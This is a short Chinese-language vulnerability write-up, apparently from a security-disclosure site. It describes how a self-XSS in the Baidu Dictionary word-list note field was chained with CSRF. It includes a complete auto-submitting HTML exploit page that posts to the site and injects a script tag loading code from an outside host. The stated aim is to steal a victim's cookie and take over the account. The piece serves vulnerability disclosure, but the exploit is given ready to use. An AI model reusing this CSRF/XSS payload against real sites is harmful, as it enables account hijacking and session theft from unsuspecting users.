百度某站可结合CSRF及XSS劫持账号 - 网站安全 - 自

百度某站可结合csrf及xss劫持账号，本来是一个self-xss，后来觉得可以结合csrf，今天才发现已经有人才这么干了！ 百度词典-我的词典

将生词添加生词本，备注的时候没有过滤，直接添加js 可被执行。

这是一个self-xss ，无法交互影响到他人，于是考虑csrf，自动添加一个单词并且备注为【xss code】

由于是post 请求，构造页面

< html > <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> </head> <body> <form id="baidu" name="baidu" action="http://dict.baidu.com/wordlist.php" method="POST"> <input type="text" name="req" value="add" /> <input type="text" name="word" value="Wooyun" /> <input type="text" name="explain" value="<script src=http://xsserme></script>" /> <input type="submit" value="submit" /> </form> <script> document.baidu.submit(); </script> </body> </html>

诱惑其他人访问此页面的效果

还有一个json？

看内容与金山词霸有点关系哦，没有深入 http:\/\/res.iciba.com\/resource\/amp3\/0\/0\/90\/01\/9001507f72.mp3

至此可某学霸的单词本里植入一个单词，偷走他的cookie，游荡他的账号，给女神发短消息。

另外，这里还有个 mysql 报错，问了大牛  

查看更多关于百度某站可结合CSRF及XSS劫持账号 - 网站安全 - 自的详细内容...